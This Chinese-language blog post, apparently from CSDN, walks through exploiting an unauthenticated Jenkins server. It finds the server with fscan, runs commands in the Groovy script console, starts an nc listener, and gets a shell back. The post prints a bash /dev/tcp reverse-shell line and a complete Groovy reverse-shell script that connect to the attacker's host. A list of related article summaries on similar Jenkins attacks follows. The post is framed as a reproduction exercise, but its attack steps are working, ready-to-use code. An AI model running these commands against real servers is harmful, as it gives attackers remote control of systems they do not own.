Jenkins未授权访问+命令执行反弹shell(复现)

最新推荐文章于 2024-03-05 09:04:32 发布
最新推荐文章于 2024-03-05 09:04:32 发布
阅读量1.4k 收藏
点赞数
分类专栏: 渗透测试 文章标签: jenkins 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/130805973
版权
文章介绍了如何利用未授权访问的Jenkins服务进行命令执行,具体步骤包括通过fscan扫描到Jenkins服务器,无密码直接进入后台,在系统管理的脚本命令行执行Groovy脚本进行命令操作,以及如何在Kali上设置监听并使用在线工具生成反弹shell命令,在Jenkins中执行该命令建立连接。
摘要由CSDN通过智能技术生成

Jenkins未授权访问+命令执行反弹shell(复现)

1、打内网的时候通过fscan扫到了一台Jenkins服务的机子

  

浏览器访问发现没有Jenkins没有设置密码,直接就未授权进后台了

 

2、在系统管理->脚本命令行

可命令执行

println "whoami".execute().text

 

3、反弹shell

3.1在kali上设置监听

 

nc -lvvp 1333

 

3.2在菱角社区搞一个反弹shell命令在线生成

网址:[~]#棱角 ::Edge.Forum* (ywhack.com)

这里我们随便拿一个

bash -i >& /dev/tcp/kali的ip/监听端口 0>&1

3.3在Jenkins的脚本命令行执行反弹shell命令

代码如下

反弹shell

groovy 是一种 java 扩展语言,java 我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,String cmdshell 模式,在 win 下是 cmd.exe ,在linux下是/bin/bash

String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

 

 

鸡肋是鸡肋!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——93、Jenkis授权访问
Fly_鹏程万里
06-17 90
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Jenkins反弹shell攻击(AppRun进程,xmrig)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
05-17 2681
一、服务器环境 Centos 7 2核4G 经典网络 Jenkins服务器 二、排查流程 1.top命令查看服务器负载 top - 16:58:25 up 164 days, 1:36, 3 users, load average: 2.25, 2.49, 2.66 Tasks: 75 total, 2 running, 73 sleeping, 0 stopped, ...
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
最新发布
黑剑
03-05 4979
本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell
Jenkins授权 反弹shell
weixin_39664643的博客
06-23 1756
Jenkins 授权 反弹shell 漏洞原理: 通过msfvenom生成python后门并执行反弹shell 漏洞环境: 攻击: kali 192.168.109.128 目标:Win10 默认安装 jenkins jenkins清华镜像 在Windows平台安装Jenkins:默认部分插件有可能因为网络安装失败,不影响漏洞复现~ 复现步骤: 所有步骤均在kali中完成 Kali中使用MSF生成python后门s.py,并在此目录开启web服务 msfvenom -p python/meter
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5845
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
Jenkins授权访问
Z_l123的博客
03-04 800
漏洞原因 Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用) 利用条件 1.使用低版本的Jenkins,默认没有登录控制 2.有登录控制,但配置文件中设置了不启用安全性(/var/lib/jenkins/config.xml 设置为false) 3.控制台使用了弱密码 漏洞复现 登录到靶场 登录 admin/admin 系统管理>全局安全配置(低版本的Jenkins,默认没有登录控制,所以这里要修改) 退出登录,系统管理>脚本命令 ..
中间件安全-jenkins授权访问
ce666666的博客
01-23 573
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 授权访问管理控制台,可以通过脚本命令执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
jenkins shell 命令,自动部署命令.txt
07-13
放在Post Steps 的shell命令 ,一键自动部署(2021最新版)
Jenkins+SVN+MAVEN+SHELL实现项目一键发布
04-28
Jenkins的构建步骤中,我们可以添加Shell命令执行如文件操作、系统调用、环境变量设置等复杂任务,进一步扩展自动化流程。 实现一键发布的具体步骤如下: 1. 配置Jenkins:在Jenkins服务器上安装必要的插件...
jenkins的windows节点执行shell脚本
01-07
迁移jenkins时,需要依赖windows的节点,在网上查了资料装好以后,接下来简直就是噩梦,因为没有人指导,在项目build上70多次的时候终于成功。...在windows服务器上执行的会提示没有找到此命令,等类似的错误,这个
Jenkins+Git+Maven+Shell+Tomcat持续集成环境
03-16
Jenkins+Git+Maven+Shell+Tomcat 持续集成环境 本文主要讲述如何使用 Jenkins、Git、Maven、Shell 和 Tomcat 搭建一个持续集成环境,以提高软件开发效率和质量。首先,Jenkins 是一个开源软件项目,旨在提供一个...
Jenkins+Docker 实现一键自动化部署项目.docx
11-06
Jenkins+Docker 实现一键自动化部署项目 本文将详细介绍如何使用 Jenkins 与 Docker 实现一键自动化部署项目。该项目环境基于 Centos 7,使用 Git(Gitee)版本控制系统。整个过程可以分为四个步骤:安装 Docker、...
【漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 932
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9117
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
从代码层面分析Jenkins授权访问CVE-2017-100035333
woshiyanfu的博客
09-22 116
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
从代码层面分析Jenkins授权访问CVE-2017-1000353
stopys6的博客
09-13 225
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
jenkins(3): jenkins执行shell命令
05-23
Jenkins 可以执行 shell 命令,以下是一些示例: 1. 执行 Shell 脚本文件: ``` sh '/path/to/script.sh' ``` 2. 执行 Shell 命令: ``` sh 'echo "Hello World"' ``` 3. 执行多条 Shell 命令: ``` sh ''' echo "Hello World" echo "How are you?" ''' ``` 4. 执行带变量的 Shell 命令: ``` def name = "John" sh "echo Hello ${name}" ``` 注意,为了避免 shell 命令中的特殊字符被 Jenkins 解释,需要使用单引号或三个单引号将命令括起来。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值